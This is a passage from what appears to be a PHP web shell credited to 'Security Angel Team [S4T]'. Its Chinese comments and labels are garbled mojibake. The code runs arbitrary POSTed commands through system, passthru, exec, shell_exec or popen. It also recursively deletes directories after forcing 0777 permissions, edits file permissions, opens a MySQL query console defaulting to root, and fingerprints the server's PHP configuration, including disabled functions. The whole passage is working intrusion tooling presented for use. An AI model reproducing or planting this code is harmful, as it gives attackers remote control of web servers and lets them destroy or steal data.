<tr class="secondalt">
|
|||
|
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
|
|||
|
if (!empty($_POST['command'])) {
|
|||
|
if ($execfunc=="system") {
|
|||
|
system($_POST['command']);
|
|||
|
} elseif ($execfunc=="passthru") {
|
|||
|
passthru($_POST['command']);
|
|||
|
} elseif ($execfunc=="exec") {
|
|||
|
$result = exec($_POST['command']);
|
|||
|
echo $result;
|
|||
|
} elseif ($execfunc=="shell_exec") {
|
|||
|
$result=shell_exec($_POST['command']);
|
|||
|
echo $result;
|
|||
|
} elseif ($execfunc=="popen") {
|
|||
|
$pp = popen($_POST['command'], 'r');
|
|||
|
$read = fread($pp, 2096);
|
|||
|
echo $read;
|
|||
|
pclose($pp);
|
|||
|
} else {
|
|||
|
system($_POST['command']);
|
|||
|
}
|
|||
|
}
|
|||
|
?></textarea></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
} else {
|
|||
|
?>
|
|||
|
<p><b>Safe_Mode <20>Ѵ<EFBFBD><D1B4><EFBFBD>, <20><EFBFBD>ִ<EFBFBD><D6B4>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD>.</b></p>
|
|||
|
<?php
|
|||
|
}
|
|||
|
}//end shell
|
|||
|
|
|||
|
elseif ($_GET['action'] == "deldir") {
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<form action="?dir=<?=urlencode($dir)?>" method="POST">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">ɾ<><C9BE> <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center">ע<><D7A2>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF>ǿ<EFBFBD>,<2C>˴β<CBB4><CEB2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><C9BE><EFBFBD><EFBFBD>Ŀ¼<C4BF>µ<EFBFBD><C2B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>.<2E><>ȷ<EFBFBD><C8B7><EFBFBD><EFBFBD>?</td>
|
|||
|
</tr>
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">
|
|||
|
<input name="action" type="hidden" value="rmdir">
|
|||
|
<input type="submit" value="delete" class="input">
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}//end deldir
|
|||
|
|
|||
|
elseif ($_GET['action'] == "fileperm") {
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center"><3E><EFBFBD><DEB8>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD> [<a href="?dir=<?=urlencode($dir)?>"><3E><><EFBFBD><EFBFBD></a>]</td>
|
|||
|
</tr>
|
|||
|
<form action="?dir=<?=urlencode($dir)?>" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ:
|
|||
|
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
|
|||
|
<input name="dir" type="hidden" value="<?=urlencode($dir)?>">
|
|||
|
<input name="action" type="hidden" value="editfileperm">
|
|||
|
<input type="submit" value="modify" class="input"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}//end fileperm
|
|||
|
|
|||
|
elseif ($_GET['action'] == "sql") {
|
|||
|
$servername = isset($servername) ? $servername : '127.0.0.1';
|
|||
|
$dbusername = isset($dbusername) ? $dbusername : 'root';
|
|||
|
$dbpassword = isset($dbpassword) ? $dbpassword : '';
|
|||
|
$dbname = isset($dbname) ? $dbname : '';
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">ִ<><D6B4> SQL <20><><EFBFBD><EFBFBD></td>
|
|||
|
</tr>
|
|||
|
<form action="?action=sql" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center">Host:
|
|||
|
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
|
|||
|
User:
|
|||
|
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
|
|||
|
Pass:
|
|||
|
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
|
|||
|
DB:
|
|||
|
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
|
|||
|
<input name="connect" type="submit" class="INPUT" value="<22><><EFBFBD><EFBFBD>"></td>
|
|||
|
</tr>
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><input type="submit" name="doquery" value="ִ<><D6B4>" class="input"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}//end sql query
|
|||
|
|
|||
|
elseif ($_GET['action'] == "phpenv") {
|
|||
|
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD>";
|
|||
|
|
|||
|
$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
|
|||
|
|
|||
|
$dis_func = get_cfg_var("disable_functions");
|
|||
|
if ($dis_func == "") {
|
|||
|
$dis_func = "No";
|
|||
|
}else {
|
|||
|
$dis_func = str_replace(" ","<br>",$dis_func);
|
|||
|
$dis_func = str_replace(",","<br>",$dis_func);
|
|||
|
}
|
|||
|
|
|||
|
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
|
|||
|
|
|||
|
$info[0] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>",date("Y<><59>m<EFBFBD><6D>d<EFBFBD><64> h:i:s",time()));
|
|||
|
$info[1] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
|
|||
|
$info[2] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP<49><50>ַ",gethostbyname($_SERVER["SERVER_NAME"]));
|
|||
|
$info[3] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ",PHP_OS);
|
|||
|
$info[5] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ<CFB5><CDB3><EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
|
|||
|
$info[6] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",$_SERVER["SERVER_SOFTWARE"]);
|
|||
|
$info[7] = array("Web<65><62><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD>",$_SERVER["SERVER_PORT"]);
|
|||
|
$info[8] = array("PHP<48><50><EFBFBD>з<EFBFBD>ʽ",strtoupper(php_sapi_name()));
|
|||
|
$info[9] = array("PHP<48>汾",PHP_VERSION);
|
|||
|
$info[10] = array("<22><><EFBFBD><EFBFBD><EFBFBD>ڰ<EFBFBD>ȫģʽ",getphpcfg("safemode"));
|
|||
|
$info[11] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա",$adminmail);
|
|||
|
$info[12] = array("<22><><EFBFBD>ļ<EFBFBD>·<EFBFBD><C2B7>",__FILE__);
|
|||
|
|
|||
|
$info[13] = array("<22><><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9> URL <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD> allow_url_fopen",getphpcfg("allow_url_fopen"));
|
|||
|
$info[14] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̬<EFBFBD><CCAC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD> enable_dl",getphpcfg("enable_dl"));
|
|||
|
$info[15] = array("<22><>ʾ<EFBFBD><CABE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ display_errors",getphpcfg("display_errors"));
|
|||
|
$info[16] = array("<22>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD> register_globals",getphpcfg("register_globals"));
|
|||
|
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
|
|||
|
$info[18] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ<EFBFBD><CAB9><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD> memory_limit",getphpcfg("memory_limit"));
|
|||
|
$info[19] = array("POST<53><54><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD> post_max_size",getphpcfg("post_max_size"));
|
|||
|
$info[20] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϴ<EFBFBD><CFB4>ļ<EFBFBD> upload_max_filesize",$upsize);
|
|||
|
$info[21] = array("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EEB3A4><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1> max_execution_time",getphpcfg("max_execution_time")."<22><>");
|
|||
|
$info[22] = array("<22><><EFBFBD><EFBFBD><EFBFBD>õĺ<C3B5><C4BA><EFBFBD> disable_functions",$dis_func);
|
|||
|
$info[23] = array("phpinfo()",$phpinfo);
|
|||
|
$info[24] = array("Ŀǰ<C4BF><C7B0><EFBFBD>п<EFBFBD><D0BF><EFBFBD><EFBFBD>ռ<EFBFBD>diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
|
|||
|
|
|||
|
$info[25] = array("ͼ<>δ<EFBFBD><CEB4><EFBFBD> GD Library",getfun("imageline"));
|
|||
|
$info[26] = array("IMAP<41><50><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD>ϵͳ",getfun("imap_close"));
|
|||
|
$info[27] = array("MySQL<51><4C><EFBFBD>ݿ<EFBFBD>",getfun("mysql_close"));
|
|||
|
$info[28] = array("SyBase<73><65><EFBFBD>ݿ<EFBFBD>",getfun("sybase_close"));
|
|||
|
$info[29] = array("Oracle<6C><65><EFBFBD>ݿ<EFBFBD>",getfun("ora_close"));
|
|||
|
$info[30] = array("Oracle 8 <20><><EFBFBD>ݿ<EFBFBD>",getfun("OCILogOff"));
|
|||
|
$info[31] = array("PREL<45><4C><EFBFBD><EFBFBD><EFBFBD> PCRE",getfun("preg_match"));
|
|||
|
$info[32] = array("PDF<44>ĵ<EFBFBD>֧<EFBFBD><D6A7>",getfun("pdf_close"));
|
|||
|
$info[33] = array("Postgre SQL<51><4C><EFBFBD>ݿ<EFBFBD>",getfun("pg_close"));
|
|||
|
$info[34] = array("SNMP<4D><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Э<EFBFBD><D0AD>",getfun("snmpget"));
|
|||
|
$info[35] = array("ѹ<><D1B9><EFBFBD>ļ<EFBFBD>֧<EFBFBD><D6A7>(Zlib)",getfun("gzclose"));
|
|||
|
$info[36] = array("XML<4D><4C><EFBFBD><EFBFBD>",getfun("xml_set_object"));
|
|||
|
$info[37] = array("FTP",getfun("ftp_login"));
|
|||
|
$info[38] = array("ODBC<42><43><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>",getfun("odbc_close"));
|
|||
|
$info[39] = array("Session֧<6E><D6A7>",getfun("session_start"));
|
|||
|
$info[40] = array("Socket֧<74><D6A7>",getfun("fsockopen"));
|
|||
|
?>
|
|||
|
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<form action="?action=phpenv" method="POST">
|
|||
|
<tr class="firstalt">
|
|||
|
<td style="padding-left: 5px;"><b><3E>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4></b></td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td style="padding-left: 5px;"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>(<28><>:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="<22>鿴" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<?php
|
|||
|
for($a=0;$a<3;$a++){
|
|||
|
if($a == 0){
|
|||
|
$hp = array("server","<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
|||
|
}elseif($a == 1){
|
|||
|
$hp = array("php","PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
|||
|
}elseif($a == 2){
|
|||
|
$hp = array("basic","<22><><EFBFBD><EFBFBD>֧<EFBFBD><D6A7>״<EFBFBD><D7B4>");
|
|||
|
}
|
|||
|
?>
|
|||
|
<tr class="firstalt">
|
|||
|
<td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td>
|
|||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
|||
|
<?
|
|||
|
if($a == 0){
|
|||
|
for($i=0;$i<=12;$i++){
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
}elseif($a == 1){
|
|||
|
for($i=13;$i<=24;$i++){
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
}elseif($a == 2){
|
|||
|
for($i=25;$i<=40;$i++){
|
|||
|
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
|
|||
|
}
|
|||
|
}
|
|||
|
?>
|
|||
|
</table>
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
<?
|
|||
|
}//for
|
|||
|
echo "</table>";
|
|||
|
}//end phpenv
|
|||
|
?>
|
|||
|
<hr width="760" noshade>
|
|||
|
<table width="760" border="0" cellpadding="0">
|
|||
|
<tr>
|
|||
|
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
|
|||
|
<td align="right"><?php
|
|||
|
debuginfo();
|
|||
|
ob_end_flush();
|
|||
|
?></td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
</center>
|
|||
|
</body>
|
|||
|
</html>
|
|||
|
|
|||
|
<?php
|
|||
|
|
|||
|
/*======================================================
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
======================================================*/
|
|||
|
|
|||
|
// <20><>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
|
|||
|
function loginpage() {
|
|||
|
?>
|
|||
|
<style type="text/css">
|
|||
|
input {
|
|||
|
font-family: "Verdana";
|
|||
|
font-size: "11px";
|
|||
|
BACKGROUND-COLOR: "#FFFFFF";
|
|||
|
height: "18px";
|
|||
|
border: "1px solid #666666";
|
|||
|
}
|
|||
|
</style>
|
|||
|
<form method="POST" action="">
|
|||
|
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">
|
|||
|
<input type="submit" value="OK">
|
|||
|
</form>
|
|||
|
<?php
|
|||
|
exit;
|
|||
|
}//end loginpage()
|
|||
|
|
|||
|
// ҳ<><D2B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
|||
|
function debuginfo() {
|
|||
|
global $starttime;
|
|||
|
$mtime = explode(' ', microtime());
|
|||
|
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
|
|||
|
echo "Processed in $totaltime second(s)";
|
|||
|
}
|
|||
|
|
|||
|
// ȥ<><C8A5>ת<EFBFBD><D7AA><EFBFBD>ַ<EFBFBD>
|
|||
|
function stripslashes_array(&$array) {
|
|||
|
while(list($key,$var) = each($array)) {
|
|||
|
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
|
|||
|
if (is_string($var)) {
|
|||
|
$array[$key] = stripslashes($var);
|
|||
|
}
|
|||
|
if (is_array($var)) {
|
|||
|
$array[$key] = stripslashes_array($var);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
return $array;
|
|||
|
}
|
|||
|
|
|||
|
// ɾ<><C9BE>Ŀ¼
|
|||
|
function deltree($deldir) {
|
|||
|
$mydir=@dir($deldir);
|
|||
|
while($file=$mydir->read()) {
|
|||
|
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
|
|||
|
@chmod("$deldir/$file",0777);
|
|||
|
deltree("$deldir/$file");
|
|||
|
}
|
|||
|
if (is_file("$deldir/$file")) {
|
|||
|
@chmod("$deldir/$file",0777);
|
|||
|
@unlink("$deldir/$file");
|
|||
|
}
|
|||
|
}
|
|||
|
$mydir->close();
|
|||
|
@chmod("$deldir",0777);
|
|||
|
echo @rmdir($deldir) ? "<b>Ŀ¼ɾ<C2BC><C9BE><EFBFBD>ɹ<EFBFBD>!</b>" : "<font color=\"#ff0000\">Ŀ¼ɾ<C2BC><C9BE>ʧ<EFBFBD><CAA7>!</font>";
|
|||
|
}
|
|||
|
|
|||
|
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
|
|||
|
function dir_writeable($dir) {
|
|||
|
if (!is_dir($dir)) {
|
|||
|
@mkdir($dir, 0777);
|
|||
|
}
|
|||
|
if(is_dir($dir)) {
|
|||
|
if ($fp = @fopen("$dir/test.txt", 'w')) {
|
|||
|
@fclose($fp);
|
|||
|
@unlink("$dir/test.txt");
|
|||
|
$writeable = 1;
|
|||
|
} else {
|
|||
|
$writeable = 0;
|
|||
|
}
|
|||
|
}
|
|||
|
return $writeable;
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD>м<EFBFBD><D0BC>ı<EFBFBD><C4B1><EFBFBD>ɫ<EFBFBD>滻
|
|||
|
function getrowbg() {
|
|||
|
global $bgcounter;
|
|||
|
if ($bgcounter++%2==0) {
|
|||
|
return "firstalt";
|
|||
|
} else {
|
|||
|
return "secondalt";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD>ļ<EFBFBD>ϵͳ·<CDB3><C2B7>
|
|||
|
function getPath($mainpath, $relativepath) {
|
|||
|
global $dir;
|
|||
|
$mainpath_info = explode('/', $mainpath);
|
|||
|
$relativepath_info = explode('/', $relativepath);
|
|||
|
$relativepath_info_count = count($relativepath_info);
|
|||
|
for ($i=0; $i<$relativepath_info_count; $i++) {
|
|||
|
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
|
|||
|
if ($relativepath_info[$i] == '..') {
|
|||
|
$mainpath_info_count = count($mainpath_info);
|
|||
|
unset($mainpath_info[$mainpath_info_count-1]);
|
|||
|
continue;
|
|||
|
}
|
|||
|
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
|
|||
|
} //end for
|
|||
|
return implode('/', $mainpath_info);
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>
|
|||
|
function getphpcfg($varname) {
|
|||
|
switch($result = get_cfg_var($varname)) {
|
|||
|
case 0:
|
|||
|
return No;
|
|||
|
break;
|
|||
|
case 1:
|
|||
|
return Yes;
|
|||
|
break;
|
|||
|
default:
|
|||
|
return $result;
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD>麯<EFBFBD><E9BAAF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
function getfun($funName) {
|
|||
|
return (false !== function_exists($funName)) ? Yes : No;
|
|||
|
}
|
|||
|
?>
|